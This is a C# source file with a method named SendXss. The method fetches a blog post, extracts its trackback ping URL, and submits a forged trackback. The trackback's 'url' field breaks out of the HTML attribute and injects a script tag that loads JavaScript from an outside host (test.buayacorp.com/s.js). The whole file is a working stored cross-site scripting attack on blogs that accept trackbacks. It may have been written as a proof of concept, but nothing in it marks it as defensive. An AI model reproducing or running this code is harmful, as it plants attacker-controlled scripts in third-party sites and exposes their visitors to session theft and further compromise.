using System;
using System.Collections.Generic;
using System.Text;
using System.Net;
using System.Text.RegularExpressions;
using System.Web;
using System.Collections.Specialized;
using System.Configuration;

namespace BuayaCorp
{
    public static class Utils
    {
		static Regex trackbackRegex = new Regex("trackback:ping\\s*=\\s*\"([^\"]+)\"", RegexOptions.Compiled | RegexOptions.IgnoreCase);
		static Regex urlRegex = new Regex("<title>([^<]+)</title>", RegexOptions.Compiled | RegexOptions.IgnoreCase);
		static Random randomValue = new Random(DateTime.Now.Second);
		public static string Hostname;

		public static string SendXss(string storyUrl, bool useStoryTitle)
		{
			return SendXss(storyUrl, string.Empty, useStoryTitle);
		}
		public static string SendXss(string storyUrl, string trackbackUrl, bool useStoryTitle)
		{
			using (WebClient client = new WebClient())
			{
				NameValueCollection data = new NameValueCollection();
				if (useStoryTitle || string.IsNullOrEmpty(trackbackUrl))
				{
					string contents = client.DownloadString(storyUrl);

					if (string.IsNullOrEmpty(trackbackUrl))
					{
						Match match = trackbackRegex.Match(contents);

						if (!match.Success || string.IsNullOrEmpty(match.Groups[1].Value))
							return "Oops, I couldn't find any trackback URL.";

						trackbackUrl = match.Groups[1].Value;
					}
					if (useStoryTitle)
					{
						Match match = urlRegex.Match(contents);
						if (match.Success)
						{
							string title = Regex.Replace(match.Groups[1].Value, @"\s*//.*$", "", RegexOptions.IgnoreCase);							
							data["title"] = title;
							data["excerpt"] = title;
						}
					}
				}

				string urlGen = randomValue.Next(7, 17) + "\"><script src=http://test.buayacorp.com/s.js></script><a href=\"http://www.buayacorp.com";
				FakeWebServer.FakeUrls[urlGen] = storyUrl;				

				if (string.IsNullOrEmpty(Hostname))
					Hostname = ConfigurationManager.AppSettings["fake_hostname"];

				if (!string.IsNullOrEmpty(Hostname))
					Hostname = Hostname.TrimEnd('/') + "/";
				else
					Hostname = "http://peru.ath.cx/";

				data["url"] = Hostname + urlGen;
				if (string.IsNullOrEmpty(data["title"]))
				{
					data["title"] = "ltimas noticias";
					data["excerpt"] = "Segn comentan en ...";
				}
				data["blog_name"] = "Ms que cdigo";
				data["charset"] = "utf-8";
				
				return Encoding.UTF8.GetString(client.UploadValues(trackbackUrl, data));
			}
		}
    }
}
